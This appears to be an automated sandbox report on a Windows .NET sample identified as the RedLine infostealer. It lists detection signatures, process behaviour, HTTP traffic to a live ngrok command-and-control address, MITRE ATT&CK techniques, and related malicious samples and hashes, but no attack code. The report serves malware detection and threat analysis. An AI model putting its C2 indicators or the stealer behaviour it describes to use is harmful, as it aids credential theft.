                  Source: 0.0.kuEfaZxkiY.exe.860000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: kuEfaZxkiY.exe PID: 7080, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: classification engine | Classification label: mal96.troj.winEXE@2/0@1/1
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_03
                  Source: kuEfaZxkiY.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: kuEfaZxkiY.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: kuEfaZxkiY.exe | ReversingLabs: Detection: 86%
                  Source: kuEfaZxkiY.exe | Virustotal: Detection: 77%
                  Source: unknown | Process created: C:\Users\user\Desktop\kuEfaZxkiY.exe C:\Users\user\Desktop\kuEfaZxkiY.exe
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: kuEfaZxkiY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: kuEfaZxkiY.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.000000000100E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ServiceModel.pdb693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32d source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.000000000100E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.000000000100E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.000000000100E000.00000004.00000020.00020000.00000000.sdmp
                  Source: kuEfaZxkiY.exe | Static PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]

                  Hooking and other Techniques for Hiding and Protection

                  Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 17383
                  Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 17383
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Memory allocated: F90000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Memory allocated: 2D00000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Memory allocated: 2B80000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe TID: 7164 | Thread sleep time: -90000s >= -30000s
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.000000000100E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]][
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Memory allocated: page read and write | page guard
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Queries volume information: C:\Users\user\Desktop\kuEfaZxkiY.exe VolumeInformation
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match | File source: kuEfaZxkiY.exe, type: SAMPLE
                  Source: Yara match | File source: 0.0.kuEfaZxkiY.exe.860000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: kuEfaZxkiY.exe PID: 7080, type: MEMORYSTR
                  Source: Yara match | File source: kuEfaZxkiY.exe, type: SAMPLE
                  Source: Yara match | File source: 0.0.kuEfaZxkiY.exe.860000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: kuEfaZxkiY.exe PID: 7080, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: kuEfaZxkiY.exe, type: SAMPLE
                  Source: Yara match | File source: 0.0.kuEfaZxkiY.exe.860000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: kuEfaZxkiY.exe PID: 7080, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 2 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Process Injection | Security Account Manager | 12 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Timestomp | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 2 Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  SourceDetectionScannerLabelLink
                  kuEfaZxkiY.exe87%ReversingLabsByteCode-MSIL.Infostealer.RedLine
                  kuEfaZxkiY.exe78%VirustotalBrowse
                  kuEfaZxkiY.exe100%AviraHEUR/AGEN.1305500
                  kuEfaZxkiY.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  0.tcp.in.ngrok.io9%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                  https://api.ipify.orgcookies//settinString.Removeg0%URL Reputationsafe
                  http://tempuri.org/Endpoint/CheckConnectLR0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/CheckConnectResponse0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/CheckConnect0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/EnvironmentSettingsLR0%Avira URL Cloudsafe
                  http://tempuri.org/0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/VerifyUpdateResponse0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/80%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/CheckConnectResponse1%VirustotalBrowse
                  http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/CheckConnect2%VirustotalBrowse
                  http://tempuri.org/Endpoint/CheckConnectLR2%VirustotalBrowse
                  http://tempuri.org/Endpoint/VerifyUpdateResponse1%VirustotalBrowse
                  http://tempuri.org/Endpoint/81%VirustotalBrowse
                  http://tempuri.org/Endpoint/SetEnvironmentLR0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/SetEnvironmentResponse1%VirustotalBrowse
                  http://tempuri.org/Endpoint/GetUpdatesLR0%Avira URL Cloudsafe
                  http://tempuri.org/0%VirustotalBrowse
                  http://tempuri.org/Endpoint/GetUpdatesResponse0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/VerifyUpdateLR0%Avira URL Cloudsafe
                  http://0.tcp.in.ngrok.io:17383/100%Avira URL Cloudmalware
                  http://tempuri.org/Endpoint/SetEnvironmentLR2%VirustotalBrowse
                  http://0.tcp.in.ngrok.io:17383100%Avira URL Cloudmalware
                  http://0.tcp.in.ngrok.io100%Avira URL Cloudmalware
                  http://tempuri.org/Endpoint/0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/GetUpdatesResponse1%VirustotalBrowse
                  http://0.tcp.in.ngrok.io9%VirustotalBrowse
                  http://tempuri.org/Endpoint/EnvironmentSettingsLR2%VirustotalBrowse
                  http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/1%VirustotalBrowse
                  http://tempuri.org/Endpoint/CheckConnectT0%Avira URL Cloudsafe
                  http://tempuri.org/00%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/EnvironmentSettingsResponse1%VirustotalBrowse
                  http://0.tcp.in.ngrok.io:17383/.100%Avira URL Cloudmalware
                  http://tempuri.org/Endpoint/GetUpdatesLR2%VirustotalBrowse
                  http://0.tcp.in.ngrok.io:17383/9%VirustotalBrowse
                  http://0.tcp.in.ngrok.io:173839%VirustotalBrowse
                  http://tempuri.org/00%VirustotalBrowse
                  http://0.tcp.in.ngrok.io:17383/.9%VirustotalBrowse
                  http://tempuri.org/Endpoint/VerifyUpdateLR2%VirustotalBrowse
                  http://tempuri.org/Endpoint/CheckConnectT2%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  0.tcp.in.ngrok.io
                  3.6.115.182
                  truefalseunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://0.tcp.in.ngrok.io:17383/false
                  • 9%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ipinfo.io/ip%appdata% | kuEfaZxkiY.exe | false | | high
http://tempuri.org/Endpoint/CheckConnectLR | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Endpoint/CheckConnectResponse | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | kuEfaZxkiY.exe | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/envelope/ | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DAC000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/ | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DAC000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Endpoint/CheckConnect | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Endpoint/EnvironmentSettingsLR | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Endpoint/VerifyUpdateResponse | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Endpoint/8 | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Endpoint/SetEnvironmentLR | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://dashboard.ngrok.com | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E64000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E6D000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ipify.orgcookies//settinString.Removeg | kuEfaZxkiY.exe | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Endpoint/GetUpdatesLR | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Endpoint/VerifyUpdateLR | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Endpoint/GetUpdatesResponse | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://0.tcp.in.ngrok.io:17383 | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp | false | 9%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://0.tcp.in.ngrok.io | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp | false | 9%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://tempuri.org/Endpoint/ | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/Endpoint/CheckConnectT | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://tempuri.org/0 | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DAC000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://0.tcp.in.ngrok.io:17383/. | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp | false | 9%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/actor/next | kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
3.6.115.182 | 0.tcp.in.ngrok.io | United States | | 16509 | AMAZON-02US | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1393953
Start date and time: 2024-02-17 20:41:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 34s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: kuEfaZxkiY.exe
renamed because original name is a hash value
Original Sample Name: 117EEF8A227E6CE3646718D0ED6FB7B1.exe
Detection: MAL
Classification: mal96.troj.winEXE@2/0@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 3
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtQueryValueKey calls found.
                                  No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3.6.115.182 | RN2vknsx6G.exe | Get hash | malicious | RedLine | Browse | 0.tcp.in.ngrok.io:17440/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
0.tcp.in.ngrok.io | ae6T8jJueq.exe | Get hash | malicious | Njrat | Browse | 3.6.115.64
| nOZ2Oqnzbz.exe | Get hash | malicious | Njrat | Browse | 3.6.115.64
| iR2UtZj5vP.exe | Get hash | malicious | Njrat | Browse | 3.6.122.107
| ZB7Ot9MOic.exe | Get hash | malicious | Njrat | Browse | 3.6.30.85
| etJZk4UQhS.exe | Get hash | malicious | Njrat | Browse | 3.6.122.107
| jango.exe | Get hash | malicious | XWorm | Browse | 3.6.30.85
| cracksetup.exe | Get hash | malicious | Nanocore | Browse | 3.6.98.232
| LocalStaFvjUblU.exe | Get hash | malicious | njRat | Browse | 3.6.122.107
| 558EofiXYO.exe | Get hash | malicious | njRat | Browse | 3.6.115.64
| JsYdl3ZkOA.exe | Get hash | malicious | njRat | Browse | 3.6.115.64
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AMAZON-02US | JccyJc1Lds.exe | Get hash | malicious | Njrat | Browse | 3.125.102.39
| ttbvIbUgTq.elf | Get hash | malicious | Unknown | Browse | 130.176.250.126
| ZDKv0w0UwA.elf | Get hash | malicious | Unknown | Browse | 13.50.181.194
| rl140Y9jeD.elf | Get hash | malicious | Mirai | Browse | 18.176.199.54
| jew.arm7.elf | Get hash | malicious | Mirai | Browse | 18.153.210.61
| NS5jNpjR8t.elf | Get hash | malicious | Mirai | Browse | 34.245.185.212
| Np14MVqF0i.elf | Get hash | malicious | Mirai | Browse | 54.119.199.8
| b4ngl4d3shS3N941.x86.elf | Get hash | malicious | Unknown | Browse | 34.249.145.219
| b4ngl4d3shS3N941.mips.elf | Get hash | malicious | Unknown | Browse | 54.247.62.1
| jew.arm7.elf | Get hash | malicious | Mirai | Browse | 52.35.208.171
                                  No context
                                  No context
                                  No created / dropped files found
File type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 5.960239123976663
